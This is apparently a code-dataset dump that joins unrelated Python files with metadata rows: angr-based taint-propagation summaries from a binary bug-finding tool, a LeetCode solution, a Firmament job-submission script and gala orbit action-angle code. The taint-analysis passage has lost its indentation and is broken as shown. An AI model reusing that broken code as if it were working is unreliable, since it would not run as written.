:param _: not used
:param plt_path: path to the plt (i.e., call_site.step())
:return: None
"""
p = _core.p
dst_reg = arg_reg_name(p, 0)
src_reg = arg_reg_name(p, 1)
reg_n = arg_reg_name(p, 2)
b1 = _core.safe_load(plt_path, getattr(plt_path.active[0].regs, dst_reg))
b2 = _core.safe_load(plt_path, getattr(plt_path.active[0].regs, src_reg))
n = _core.safe_load(plt_path, getattr(plt_path.active[0].regs, reg_n))
# we untaint buffers only if n is not tainted
if not _core.is_tainted(n, plt_path):
if not _core.is_tainted(b1, plt_path):
b1 = None
if not _core.is_tainted(b2, plt_path):
b2 = None
# if either of the two is not tainted, we untaint the other
if b1 is not None and b2 is None:
_core.do_recursive_untaint(b1, plt_path)
elif b2 is not None and b1 is None:
_core.do_recursive_untaint(b2, plt_path)
# step into it
plt_path.step()
assert _core.p.is_hooked(plt_path.active[0].addr), "memcmp_sized: Summary function relies on angr's " \
"sim procedure, add option use_sim_procedures to the loader"
plt_path.step()
def memcpy_sized(_core, call_site_path, plt_path):
"""
memcpy-like sized (e.g., memcpy) function summary
:param _core: core taint engine
:param call_site_path: call site angr path
:param plt_path: path to the plt (i.e., call_site.step())
:return: None
"""
p = _core.p
# if the second parameter is tainted (or pointing to a tainted location)
# or the third is tainted, we taint the first too
dst_reg = arg_reg_name(p, 0)
dst = getattr(plt_path.active[0].regs, dst_reg)
dst_loaded = _core.safe_load(plt_path, dst)
src_reg = arg_reg_name(p, 1)
src = getattr(plt_path.active[0].regs, src_reg)
src_loaded = _core.safe_load(plt_path, src)
reg_n = arg_reg_name(p, 2)
n = getattr(plt_path.active[0].regs, reg_n)
# n_loaded = _core.safe_load(plt_path_cp, size)
plt_path.step()
assert _core.p.is_hooked(plt_path.active[0].addr), "memcpy_sized: Summary function relies on angr's " \
"sim procedure, add option use_sim_procedures to the loader"
plt_path.step()
if not plt_path.active:
raise Exception("size of function has no active successors, not walking this path...")
# apply taint to dst if source is tainted and constrain this buffer
# TODO take N into account
if _core.is_tainted(src_loaded, path=plt_path):
src_loaded_full = _core.safe_load(plt_path, src, estimate_size=True)
new_dst_t = _core.get_sym_val(name=_core.taint_buf, bits=src_loaded_full.length).reversed
_core.add_taint_glob_dep(new_dst_t, src_loaded_full, plt_path)
plt_path.active[0].add_constraints(src_loaded_full == new_dst_t)
plt_path.active[0].memory.store(dst, new_dst_t)
# untaint if the size is constrained
if (_core.is_tainted(dst, path=plt_path) or
_core.is_tainted(dst_loaded, path=plt_path)) and \
not _core.is_tainted(n, path=plt_path):
# do untaint
_core.do_recursive_untaint(dst_loaded, plt_path)
def memcpy_unsized(_core, call_site_path, plt_path):
"""
memcpy-like unsize (e.g., strcpy) function summary
:param _core: core taint engine
:param call_site_path: call site angr path
:param plt_path: path to the plt (i.e., call_site.step())
:return: None
"""
p = _core.p
dst_reg = arg_reg_name(p, 0)
dst = getattr(plt_path.active[0].regs, dst_reg)
# dst_loaded = _core.safe_load(plt_path_cp, dst, estimate_size=True)
src_reg = arg_reg_name(p, 1)
src = getattr(plt_path.active[0].regs, src_reg)
src_loaded = _core.safe_load(plt_path, src)
# run the sim procedure
plt_path.step()
assert _core.p.is_hooked(plt_path.active[0].addr), "memcpy_unsized: Summary function relies on angr's " \
"sim procedure, add option use_sim_procedures to the loader"
plt_path.step()
if not plt_path.active:
raise Exception("size of function has no active successors, not walking this path...")
# apply taint to dst if source is tainted and constrain this buffer
if _core.is_tainted(src_loaded, path=plt_path):
src_loaded_full = _core.safe_load(plt_path, src, estimate_size=True)
new_dst_t = _core.get_sym_val(name=_core.taint_buf, bits=src_loaded_full.length).reversed
_core.add_taint_glob_dep(new_dst_t, src_loaded_full, plt_path)
plt_path.active[0].add_constraints(src_loaded_full == new_dst_t)
plt_path.active[0].memory.store(dst, new_dst_t)
def is_size_taint(v):
return '__size__' in str(v)
def sizeof(_core, call_site_path, plt_path):
"""
sizeof-like (e.g., strlen) function summary
:param _core: core taint engine
:param call_site_path: call site angr path
:param plt_path: path to the plt (i.e., call_site.step())
:return: None
"""
p = _core.p
n = getattr(plt_path.active[0].regs, arg_reg_name(p, 0))
cnt = _core.safe_load(plt_path, n, _core.taint_buf_size/8)
# use the sim procedure to continue to the next state and add constraints
plt_path.step()
assert _core.p.is_hooked(plt_path.active[0].addr), "sizeof: Summary function relies on angr's " \
"sim procedure, add option use_sim_procedures to the loader"
plt_path.step()
if not plt_path.active:
raise Exception("size of function has no active successors, not walking this path...")
return_value = getattr(plt_path.active[0].regs, ret_reg_name(p))
# TODO: check if the constraints set by angr sim procedure are correct
# if there is a tainted buffer in one of the registers then also taint this variable
if _core.is_tainted(cnt, path=plt_path) or _core.is_tainted(n, path=plt_path):
t = _core.get_sym_val(name=(_core.taint_buf + '__size__'), bits=p.arch.bits).reversed
_core.add_taint_glob_dep(t, cnt, plt_path)
# constrain output of this variable equal to the output of sizeof and add it to the return register
plt_path.active[0].add_constraints(return_value == t)
setattr(plt_path.active[0].regs, ret_reg_name(p), t)
#
# Heap functions
#
def _malloc(_core, _, plt_path):
"""
maclloc function summary
:param _core: core taint engine
:param plt_path: path to the plt (i.e., call_site.step())
:return: None
"""
p = _core.p
state = plt_path.active[0]
sim_size = getattr(state.regs, arg_reg_name(p, 0))
# when the size is symbolic, choose the maximum size possible
if state.solver.symbolic(sim_size):
size = state.solver.max(sim_size)
if size > state.libc.max_variable_size:
size = state.libc.max_variable_size
setattr(state.regs, arg_reg_name(p, 0), size)
# use the sim procedure
plt_path.step()
assert _core.p.is_hooked(plt_path.active[0].addr), "malloc: Summary function relies on angr's " \
"sim procedure, add option use_sim_procedures to the loader"
plt_path.step()
return sim_size
def _realloc(_core, _, plt_path):
"""
realloc function summary
:param _core: core taint engine
:param plt_path: path to the plt (i.e., call_site.step())
:return: None
"""
p = _core.p
state = plt_path.active[0]
sim_size = getattr(state.regs, arg_reg_name(p, 1))
# ptr = getattr(state.regs, arg_reg_name(p, 0))
# when the size is symbolic, choose the maximum size possible
if state.solver.symbolic(sim_size):
size = state.solver.max(sim_size)
if size > state.libc.max_variable_size:
size = state.libc.max_variable_size
setattr(state.regs, arg_reg_name(p, 0), size)
# if the size is not tainted, use the sim procedure
plt_path.step()
assert _core.p.is_hooked(plt_path.active[0].addr), "realloc: Summary function relies on angr's " \
"sim procedure, add option use_sim_procedures to the loader"
plt_path.step()
return sim_size
def heap_alloc(_core, call_site_path, plt_path):
"""
Heap allocation function stub
:param _core: core taint engine
:param call_site_path: call site angr path
:param plt_path: path to the plt (i.e., call_site.step())
:return: None
"""
fname = _get_function_name(plt_path.active[0].addr, _core.p)
sim_size = None
if fname == 'malloc':
sim_size = _malloc(_core, call_site_path, plt_path)
elif fname == 'realloc':
sim_size = _realloc(_core, call_site_path, plt_path)
else:
print(f"Implement this heap alloc: {fname}")
if sim_size is not None:
taint_args = [l for l in sim_size.recursive_leaf_asts if _core.is_tainted(l, call_site_path)]
if taint_args and len(set(taint_args)) == 1:
arg = taint_args[0]
if is_size_taint(arg):
_core.do_recursive_untaint(arg, plt_path)
#
# Env function
#
env_var = {}
def _setenv(_core, _, plt_path):
"""
setenv function summary
:param _core: core taint engine
:param plt_path: path to the plt (i.e., call_site.step())
:return: None
"""
global env_var
p = _core.p
plt_path_cp = plt_path.copy(deep=True)
plt_state_cp = plt_path_cp.active[0]
# add the environment variable to the list of env_variables with this key
key = getattr(plt_path.active[0].regs, arg_reg_name(p, 0))
env_var[str(key)] = getattr(plt_path.active[0].regs, arg_reg_name(p, 1))
# this call can continue with an empty sim procedure since it does nothing
next_state = plt_state_cp.step()
_core.p.hook(next_state.addr, ReturnUnconstrained())
plt_path.step().step()
def _getenv(_core, call_site_addr, plt_path):
"""
getenv function summary
:param _core: core taint engine
:param call_site_addr: call site angr path
:param plt_path: path to the plt (i.e., call_site.step())
:return: None
"""
global env_var
p = _core.p
env_var_size = _core.taint_buf_size
reg = getattr(plt_path.active[0].regs, arg_reg_name(p, 0))
cnt_mem = _core.safe_load(plt_path, reg)
key = str(reg)
# this info is passed by some user controllable source
if _core.is_tainted(reg, path=plt_path) or _core.is_tainted(cnt_mem, path=plt_path):
to_store = _core.get_sym_val(name=_core.taint_buf, bits=env_var_size)
# it was set before
elif key in env_var:
to_store = env_var[key]
# fresh symbolic var
else:
to_store = _core.get_sym_val(name="env_var", bits=env_var_size)
# store the symbolic buffer at the memory address
addr = plt_path.active[0].heap.allocate(env_var_size)
plt_path.active[0].memory.store(addr, to_store)
# use an empty hook as sim procedure to continue with the program
plt_path_cp = plt_path.copy(deep=True)
plt_state_cp = plt_path_cp.active[0]
next_state = plt_state_cp.step()
_core.p.hook(next_state.addr, ReturnUnconstrained())
plt_path.step().step()
# set the return address to the pointer
setattr(plt_path.active[0].regs, ret_reg_name(p), addr)
def env(_core, call_site_path, plt_path):
"""
Summarize environment functions (getenv, and setenv)
:param _core: core taint engin
:param call_site_path: call site angr path
:param plt_path: path to the plt (i.e., call_site.step())
:return:
"""
fname = _get_function_name(plt_path.active[0].addr, _core.p)
if fname == 'setenv':
_setenv(_core, call_site_path, plt_path)
elif fname == 'getenv':
_getenv(_core, call_site_path, plt_path)
else:
print(f"Implement this Env function: {fname}")
# return the env_var if tainted to store for bug_finders
#
# Numerical
#
def atoi(_core, _, plt_path):
p = _core.p
state = plt_path.active[0]
val = getattr(state.regs, arg_reg_name(p, 0))
if _core.is_or_points_to_tainted_data(val, plt_path):
addr = plt_path.active[0].memory.load(val, p.arch.bytes)
_core.do_recursive_untaint(addr, plt_path)
plt_path.step().step()
| 34.100703 | 117 | 0.665614 | 2,280 | 14,561 | 3.982895 | 0.114474 | 0.099438 | 0.057262 | 0.057042 | 0.700914 | 0.683295 | 0.665896 | 0.642881 | 0.619095 | 0.608964 | 0 | 0.007723 | 0.235286 | 14,561 | 426 | 118 | 34.180751 | 0.807813 | 0.291189 | 0 | 0.59596 | 0 | 0 | 0.105688 | 0 | 0 | 0 | 0 | 0.004695 | 0.035354 | 1 | 0.075758 | false | 0.005051 | 0.005051 | 0.005051 | 0.10101 | 0.010101 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
aa1ecc00932000826e0af0c980cbcdd6a456cc46 | 926 | py | Python | python/091-100/Interleaving String.py | KaiyuWei/leetcode | fd61f5df60cfc7086f7e85774704bacacb4aaa5c | [
"MIT"
] | 150 | 2015-04-04T06:53:49.000Z | 2022-03-21T13:32:08.000Z | python/091-100/Interleaving String.py | yizhu1012/leetcode | d6fa443a8517956f1fcc149c8c4f42c0ad93a4a7 | [
"MIT"
] | 1 | 2015-04-13T15:15:40.000Z | 2015-04-21T20:23:16.000Z | python/091-100/Interleaving String.py | yizhu1012/leetcode | d6fa443a8517956f1fcc149c8c4f42c0ad93a4a7 | [
"MIT"
] | 64 | 2015-06-30T08:00:07.000Z | 2022-01-01T16:44:14.000Z | class Solution:
# @param {string} s1
# @param {string} s2
# @param {string} s3
# @return {boolean}
def isInterleave(self, s1, s2, s3):
m = len(s1)
n = len(s2)
if m+n != len(s3):
return False
table = [([False] * (m+1)) for i in range(n+1)]
table[0][0] = True
for i in range (1, m+1):
if s3[i-1] == s1[i-1] and table[0][i-1] == True:
table[0][i] = True
for i in range (1, n+1):
if s3[i-1] == s2[i-1] and table[i-1][0] == True:
table[i][0] = True
for i in range (1, n+1):
for j in range(1, m+1):
if s3[i+j-1] == s2[i-1] and table[i-1][j] == True:
table[i][j] = True
if s3[i+j-1] == s1[j-1] and table[i][j-1] == True:
table[i][j] = True
return table[n][m] | 33.071429 | 66 | 0.402808 | 148 | 926 | 2.52027 | 0.182432 | 0.042895 | 0.064343 | 0.117962 | 0.402145 | 0.284182 | 0.284182 | 0.257373 | 0 | 0 | 0 | 0.083799 | 0.420086 | 926 | 28 | 67 | 33.071429 | 0.610801 | 0.079914 | 0 | 0.190476 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
aa2716777e5784947bfab68b664551c0c517f631 | 4,540 | py | Python | scripts/job/memcached_submit.py | Container-Projects/firmament | d0de5258f0805f8d17b45d70c0a8e6d6a67617c0 | [
"Apache-2.0",
"OpenSSL"
] | 287 | 2016-05-13T17:45:48.000Z | 2022-01-23T00:26:20.000Z | scripts/job/memcached_submit.py | Container-Projects/firmament | d0de5258f0805f8d17b45d70c0a8e6d6a67617c0 | [
"Apache-2.0",
"OpenSSL"
] | 33 | 2016-05-13T11:40:21.000Z | 2020-11-16T17:57:17.000Z | scripts/job/memcached_submit.py | Container-Projects/firmament | d0de5258f0805f8d17b45d70c0a8e6d6a67617c0 | [
"Apache-2.0",
"OpenSSL"
] | 64 | 2016-05-26T06:35:39.000Z | 2021-09-27T12:02:44.000Z | from base import job_desc_pb2
from base import task_desc_pb2
from base import reference_desc_pb2
from google.protobuf import text_format
import httplib, urllib, re, sys, random
import binascii
import time
import shlex
def add_worker_task(job_name, task, binary, args, worker_id, num_workers, extra_args):
task.uid = 0
task.name = "%s/%d" % (job_name, worker_id)
task.state = task_desc_pb2.TaskDescriptor.CREATED
task.binary = "/usr/bin/python"
task.args.extend(args)
task.args.append(str(worker_id))
task.args.append(str(num_workers))
task.args.append(binary)
task.args.extend(extra_args)
task.inject_task_lib = True
if len(sys.argv) < 4:
print "usage: memcached_submit.py <coordinator hostname> <web UI port> " \
"<task binary> [<args>] [<num workers>] [<job name>]"
sys.exit(1)
hostname = sys.argv[1]
port = int(sys.argv[2])
memcached_exe = sys.argv[3]
if len(sys.argv) > 4:
extra_args = shlex.split(sys.argv[4])
else:
extra_args = []
if len(sys.argv) > 5:
num_workers = int(sys.argv[5])
else:
num_workers = 1
if len(sys.argv) > 6:
job_name = sys.argv[6]
else:
job_name = "memcached_job_at_%d" % (int(time.time()))
basic_args = []
basic_args.append("/home/srguser/firmament-experiments/helpers/napper/napper_memcached.py")
basic_args.append("caelum-301:2181")
basic_args.append(job_name)
job_desc = job_desc_pb2.JobDescriptor()
job_desc.uuid = "" # UUID will be set automatically on submission
job_desc.name = job_name
# set up root task
job_desc.root_task.uid = 0
job_desc.root_task.name = job_name + "/0"
job_desc.root_task.state = task_desc_pb2.TaskDescriptor.CREATED
job_desc.root_task.binary = "/usr/bin/python"
job_desc.root_task.args.extend(basic_args)
job_desc.root_task.args.append("0") # root task is worker ID 0
job_desc.root_task.args.append(str(num_workers))
job_desc.root_task.args.append(memcached_exe)
job_desc.root_task.args.extend(extra_args)
job_desc.root_task.inject_task_lib = True
# add workers
for i in range(1, num_workers):
task = job_desc.root_task.spawned.add()
add_worker_task(job_name, task, memcached_exe, basic_args, i, num_workers, extra_args)
input_id = binascii.unhexlify('feedcafedeadbeeffeedcafedeadbeeffeedcafedeadbeeffeedcafedeadbeef')
output_id = binascii.unhexlify('db33daba280d8e68eea6e490723b02cedb33daba280d8e68eea6e490723b02ce')
output2_id = binascii.unhexlify('feedcafedeadbeeffeedcafedeadbeeffeedcafedeadbeeffeedcafedeadbeef')
job_desc.output_ids.append(output_id)
job_desc.output_ids.append(output2_id)
input_desc = job_desc.root_task.dependencies.add()
input_desc.id = input_id
input_desc.scope = reference_desc_pb2.ReferenceDescriptor.PUBLIC
input_desc.type = reference_desc_pb2.ReferenceDescriptor.CONCRETE
input_desc.non_deterministic = False
input_desc.location = "blob:/tmp/fib_in"
final_output_desc = job_desc.root_task.outputs.add()
final_output_desc.id = output_id
final_output_desc.scope = reference_desc_pb2.ReferenceDescriptor.PUBLIC
final_output_desc.type = reference_desc_pb2.ReferenceDescriptor.FUTURE
final_output_desc.non_deterministic = True
final_output_desc.location = "blob:/tmp/out1"
final_output2_desc = job_desc.root_task.outputs.add()
final_output2_desc.id = output2_id
final_output2_desc.scope = reference_desc_pb2.ReferenceDescriptor.PUBLIC
final_output2_desc.type = reference_desc_pb2.ReferenceDescriptor.FUTURE
final_output2_desc.non_deterministic = True
final_output2_desc.location = "blob:/tmp/out2"
#params = urllib.urlencode({'test': text_format.MessageToString(job_desc)})
params = 'jd=%s' % text_format.MessageToString(job_desc)
print "SUBMITTING job with parameters:"
print params
print ""
try:
headers = {"Content-type": "application/x-www-form-urlencoded"}
conn = httplib.HTTPConnection("%s:%s" % (hostname, port))
conn.request("POST", "/job/submit/", params, headers)
response = conn.getresponse()
except Exception as e:
print "ERROR connecting to coordinator: %s" % (e)
sys.exit(1)
data = response.read()
match = re.search(r"([0-9a-f\-]+)", data, re.MULTILINE | re.S | re.I | re.U)
print "----------------------------------------------"
if match and response.status == 200:
job_id = match.group(1)
print "JOB SUBMITTED successfully!\nJOB ID is %s\nStatus page: " \
"http://%s:%d/job/status/?id=%s" % (job_id, hostname, port, job_id)
else:
print "ERROR submitting job -- response was: %s (Code %d)" % (response.reason,
response.status)
print "----------------------------------------------"
conn.close()
| 36.910569 | 99 | 0.745154 | 658 | 4,540 | 4.905775 | 0.264438 | 0.049876 | 0.047708 | 0.065056 | 0.349133 | 0.208798 | 0.129492 | 0.0886 | 0 | 0 | 0 | 0.022139 | 0.114537 | 4,540 | 122 | 100 | 37.213115 | 0.780846 | 0.037885 | 0 | 0.07619 | 0 | 0 | 0.199679 | 0.088721 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.07619 | null | null | 0.085714 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
aa276bd863f21ed290ee913192b1706b7cc21ea2 | 16,059 | py | Python | gala/dynamics/_genfunc/genfunc_3d.py | ltlancas/gala | 2621bb599d67e74a85446abf72d5930ef70ca181 | [
"MIT"
] | 1 | 2021-10-14T03:36:15.000Z | 2021-10-14T03:36:15.000Z | gala/dynamics/_genfunc/genfunc_3d.py | ltlancas/gala | 2621bb599d67e74a85446abf72d5930ef70ca181 | [
"MIT"
] | null | null | null | gala/dynamics/_genfunc/genfunc_3d.py | ltlancas/gala | 2621bb599d67e74a85446abf72d5930ef70ca181 | [
"MIT"
] | null | null | null | # Solving the series of linear equations for true action
# and generating function Fourier components
import numpy as np
import matplotlib.pyplot as plt
from scipy.integrate import odeint
from matplotlib.ticker import MaxNLocator
import matplotlib.cm as cm
import time
# in units kpc, km/s and 10^11 M_solar
Grav = 430091.7270069976
Conv = 0.9777922216
import toy_potentials as toy
import test_potentials as pot
import solver
import visualize_surfaces as vs
from solver import unroll_angles as ua
def choose_NT(N_max,iffreq=True):
""" calculates number of time samples required to constrain N_max modes
--- equation (21) from Sanders & Binney (2014) """
if(iffreq):
return max(200,9*N_max**3/4)
else:
return max(100,N_max**3/2)
def check_angle_solution(ang,n_vec,toy_aa,timeseries):
""" Plots the toy angle solution against the toy angles ---
Takes true angles and frequencies ang,
the Fourier vectors n_vec,
the toy action-angles toy_aa
and the timeseries """
f,a=plt.subplots(3,1)
for i in range(3):
a[i].plot(toy_aa.T[i+3],'.')
size = len(ang[6:])/3
AA = np.array([np.sum(ang[6+i*size:6+(i+1)*size]*np.sin(np.sum(n_vec*K,axis=1))) for K in toy_aa.T[3:].T])
a[i].plot((ang[i]+ang[i+3]*timeseries-2.*AA) % (2.*np.pi),'.')
a[i].set_ylabel(r'$\theta$'+str(i+1))
a[2].set_xlabel(r'$t$')
plt.show()
def check_target_angle_solution(ang,n_vec,toy_aa,timeseries):
""" Plots the angle solution and the toy angles ---
Takes true angles and frequencies ang,
the Fourier vectors n_vec,
the toy action-angles toy_aa
and the timeseries """
f,a=plt.subplots(3,1)
for i in range(3):
# a[i].plot(toy_aa.T[i+3],'.')
size = len(ang[6:])/3
AA = np.array([np.sum(ang[6+i*size:6+(i+1)*size]*np.sin(np.sum(n_vec*K,axis=1))) for K in toy_aa.T[3:].T])
a[i].plot(((toy_aa.T[i+3]+2.*AA) % (2.*np.pi))-(ang[i]+timeseries*ang[i+3]) % (2.*np.pi),'.')
a[i].plot(toy_aa.T[i+3],'.')
a[i].set_ylabel(r'$\theta$'+str(i+1))
a[2].set_xlabel(r'$t$')
plt.show()
def eval_mean_error_functions(act,ang,n_vec,toy_aa,timeseries,withplot=False):
""" Calculates sqrt(mean(E)) and sqrt(mean(F)) """
Err = np.zeros(6)
NT = len(timeseries)
size = len(ang[6:])/3
UA = ua(toy_aa.T[3:].T,np.ones(3))
fig,axis=None,None
if(withplot):
fig,axis=plt.subplots(3,2)
plt.subplots_adjust(wspace=0.3)
for K in range(3):
ErrJ = np.array([(i[K]-act[K]-2.*np.sum(n_vec.T[K]*act[3:]*np.cos(np.dot(n_vec,i[3:]))))**2 for i in toy_aa])
Err[K] = np.sum(ErrJ)
ErrT = np.array(((ang[K]+timeseries*ang[K+3]-UA.T[K]-2.*np.array([np.sum(ang[6+K*size:6+(K+1)*size]*np.sin(np.sum(n_vec*i,axis=1))) for i in toy_aa.T[3:].T])))**2)
Err[K+3] = np.sum(ErrT)
if(withplot):
axis[K][0].plot(ErrJ,'.')
axis[K][0].set_ylabel(r'$E$'+str(K+1))
axis[K][1].plot(ErrT,'.')
axis[K][1].set_ylabel(r'$F$'+str(K+1))
if(withplot):
for i in range(3):
axis[i][0].set_xlabel(r'$t$')
axis[i][1].set_xlabel(r'$t$')
plt.show()
EJ = np.sqrt(Err[:3]/NT)
ET = np.sqrt(Err[3:]/NT)
return np.array([EJ,ET])
def box_actions(results, times, N_matrix, ifprint):
"""
Finds actions, angles and frequencies for box orbit.
Takes a series of phase-space points from an orbit integration at times t and returns
L = (act,ang,n_vec,toy_aa, pars) -- explained in find_actions() below.
"""
if(ifprint):
print("\n=====\nUsing triaxial harmonic toy potential")
t = time.time()
# Find best toy parameters
omega = toy.findbestparams_ho(results)
if(ifprint):
print("Best omega "+str(omega)+" found in "+str(time.time()-t)+" seconds")
# Now find toy actions and angles
AA = np.array([toy.angact_ho(i,omega) for i in results])
AA = AA[~np.isnan(AA).any(1)]
if(len(AA)==0):
return
t = time.time()
act = solver.solver(AA, N_matrix)
if act==None:
return
if(ifprint):
print("Action solution found for N_max = "+str(N_matrix)+", size "+str(len(act[0]))+" symmetric matrix in "+str(time.time()-t)+" seconds")
np.savetxt("GF.Sn_box",np.vstack((act[1].T,act[0][3:])).T)
ang = solver.angle_solver(AA,times,N_matrix,np.ones(3))
if(ifprint):
print("Angle solution found for N_max = "+str(N_matrix)+", size "+str(len(ang))+" symmetric matrix in "+str(time.time()-t)+" seconds")
# Just some checks
if(len(ang)>len(AA)):
print("More unknowns than equations")
return act[0], ang, act[1], AA, omega
def loop_actions(results, times, N_matrix, ifprint):
"""
Finds actions, angles and frequencies for loop orbit.
Takes a series of phase-space points from an orbit integration at times t and returns
L = (act,ang,n_vec,toy_aa, pars) -- explained in find_actions() below.
results must be oriented such that circulation is about the z-axis
"""
if(ifprint):
print("\n=====\nUsing isochrone toy potential")
t = time.time()
# First find the best set of toy parameters
params = toy.findbestparams_iso(results)
if(params[0]!=params[0]):
params = np.array([10.,10.])
if(ifprint):
print("Best params "+str(params)+" found in "+str(time.time()-t)+" seconds")
# Now find the toy angles and actions in this potential
AA = np.array([toy.angact_iso(i,params) for i in results])
AA = AA[~np.isnan(AA).any(1)]
if(len(AA)==0):
return
t = time.time()
act = solver.solver(AA, N_matrix,symNx = 1)
if act==None:
return
if(ifprint):
print("Action solution found for N_max = "+str(N_matrix)+", size "+str(len(act[0]))+" symmetric matrix in "+str(time.time()-t)+" seconds")
# Store Sn
np.savetxt("GF.Sn_loop",np.vstack((act[1].T,act[0][3:])).T)
# Find angles
sign = np.array([1.,np.sign(results[0][0]*results[0][4]-results[0][1]*results[0][3]),1.])
ang = solver.angle_solver(AA,times,N_matrix,sign,symNx = 1)
if(ifprint):
print("Angle solution found for N_max = "+str(N_matrix)+", size "+str(len(ang))+" symmetric matrix in "+str(time.time()-t)+" seconds")
# Just some checks
if(len(ang)>len(AA)):
print("More unknowns than equations")
return act[0], ang, act[1], AA, params
def angmom(x):
""" returns angular momentum vector of phase-space point x"""
return np.array([x[1]*x[5]-x[2]*x[4],x[2]*x[3]-x[0]*x[5],x[0]*x[4]-x[1]*x[3]])
def assess_angmom(X):
"""
Checks for change of sign in each component of the angular momentum.
Returns an array with ith entry 1 if no sign change in i component
and 0 if sign change.
Box = (0,0,0)
S.A loop = (0,0,1)
L.A loop = (1,0,0)
"""
L=angmom(X[0])
loop = np.array([1,1,1])
for i in X[1:]:
L0 = angmom(i)
if(L0[0]*L[0]<0.):
loop[0] = 0
if(L0[1]*L[1]<0.):
loop[1] = 0
if(L0[2]*L[2]<0.):
loop[2] = 0
return loop
def flip_coords(X,loop):
""" Align circulation with z-axis """
if(loop[0]==1):
return np.array(map(lambda i: np.array([i[2],i[1],i[0],i[5],i[4],i[3]]),X))
else:
return X
def find_actions(results, t, N_matrix=8, use_box=False, ifloop=False, ifprint = True):
"""
Main routine:
Takes a series of phase-space points from an orbit integration at times t and returns
L = (act,ang,n_vec,toy_aa, pars) where act is the actions, ang the initial angles and
frequencies, n_vec the n vectors of the Fourier modes, toy_aa the toy action-angle
coords, and pars are the toy potential parameters
N_matrix sets the maximum |n| of the Fourier modes used,
use_box forces the routine to use the triaxial harmonic oscillator as the toy potential,
ifloop=True returns orbit classification,
ifprint=True prints progress messages.
"""
# Determine orbit class
loop = assess_angmom(results)
arethereloops = np.any(loop>0)
if(arethereloops and not use_box):
L = loop_actions(flip_coords(results,loop),t,N_matrix, ifprint)
if(L==None):
if(ifprint):
print "Failed to find actions for this orbit"
return
# Used for switching J_2 and J_3 for long-axis loop orbits
# This is so the orbit classes form a continuous plane in action space
# if(loop[0]):
# L[0][1],L[0][2]=L[0][2],L[0][1]
# L[1][1],L[1][2]=L[1][2],L[1][1]
# L[1][4],L[1][5]=L[1][5],L[1][4]
# L[3].T[1],L[3].T[2]=L[3].T[2],L[3].T[1]
else:
L = box_actions(results,t,N_matrix, ifprint)
if(L==None):
if(ifprint):
print "Failed to find actions for this orbit"
return
if(ifloop):
return L,loop
else:
return L
###################
# Plotting tests #
###################
from solver import check_each_direction as ced
def plot_Sn_timesamples(PSP):
""" Plots Fig. 5 from Sanders & Binney (2014) """
TT = pot.stackel_triax()
f,a = plt.subplots(2,1,figsize=[3.32,3.6])
plt.subplots_adjust(hspace=0.,top=0.8)
LowestPeriod = 2.*np.pi/38.86564386
Times = np.array([2.,4.,8.,12.])
Sr = np.arange(2,14,2)
# Loop over length of integration window
for i,P,C in zip(Times,['.','s','D','^'],['k','r','b','g']):
diffact = np.zeros((len(Sr),3))
difffreq = np.zeros((len(Sr),3))
MAXGAPS = np.array([])
# Loop over N_max
for k,j in enumerate(Sr):
NT = choose_NT(j)
timeseries=np.linspace(0.,i*LowestPeriod,NT)
results = odeint(pot.orbit_derivs2,PSP,timeseries,args=(TT,),rtol=1e-13,atol=1e-13)
act,ang,n_vec,toy_aa, pars = find_actions(results, timeseries,N_matrix=j,ifprint=False,use_box=True)
# Check all modes
checks,maxgap = ced(n_vec,ua(toy_aa.T[3:].T,np.ones(3)))
if len(maxgap)>0:
maxgap = np.max(maxgap)
else:
maxgap = 0
diffact[k] = act[:3]/TT.action(results[0])
print i,j,print_max_average(n_vec,toy_aa.T[3:].T,act[3:]),str(ang[3:6]-TT.freq(results[0])).replace('[','').replace(']',''),str(np.abs(act[:3]-TT.action(results[0]))).replace('[','').replace(']',''),len(checks),maxgap
MAXGAPS = np.append(MAXGAPS,maxgap)
difffreq[k] = ang[3:6]/TT.freq(results[0])
size = 15
if(P=='.'):
size = 30
LW = np.array(map(lambda i: 0.5+i*0.5, MAXGAPS))
a[0].scatter(Sr,np.log10(np.abs(diffact.T[2]-1)),marker=P,s=size, color=C,facecolors="none",lw=LW,label=r'$T =\,$'+str(i)+r'$\,T_F$')
a[1].scatter(Sr,np.log10(np.abs(difffreq.T[2]-1)),marker=P,s=size, color=C,facecolors="none", lw=LW)
a[1].get_yticklabels()[-1].set_visible(False)
a[0].set_xticklabels([])
a[0].set_xlim(1,13)
a[0].set_ylabel(r"$\log_{10}|J_3^\prime/J_{3, \rm true}-1|$")
leg = a[0].legend(loc='upper center',bbox_to_anchor=(0.5,1.4),ncol=2, scatterpoints = 1)
leg.draw_frame(False)
a[1].set_xlim(1,13)
a[1].set_xlabel(r'$N_{\rm max}$')
a[1].set_ylabel(r"$\log_{10}|\Omega_3^\prime/\Omega_{3,\rm true}-1|$")
plt.savefig('Sn_T_box.pdf',bbox_inches='tight')
def plot3D_stacktriax(initial,final_t,N_MAT,file_output):
""" For producing plots from paper """
# Setup Stackel potential
TT = pot.stackel_triax()
times = choose_NT(N_MAT)
timeseries=np.linspace(0.,final_t,times)
# Integrate orbit
results = odeint(pot.orbit_derivs2,initial,timeseries,args=(TT,),rtol=1e-13,atol=1e-13)
# Find actions, angles and frequencies
(act,ang,n_vec,toy_aa, pars),loop = find_actions(results, timeseries,N_matrix=N_MAT,ifloop=True)
toy_pot = 0
if(loop[2]>0.5 or loop[0]>0.5):
toy_pot = pot.isochrone(par=np.append(pars,0.))
else:
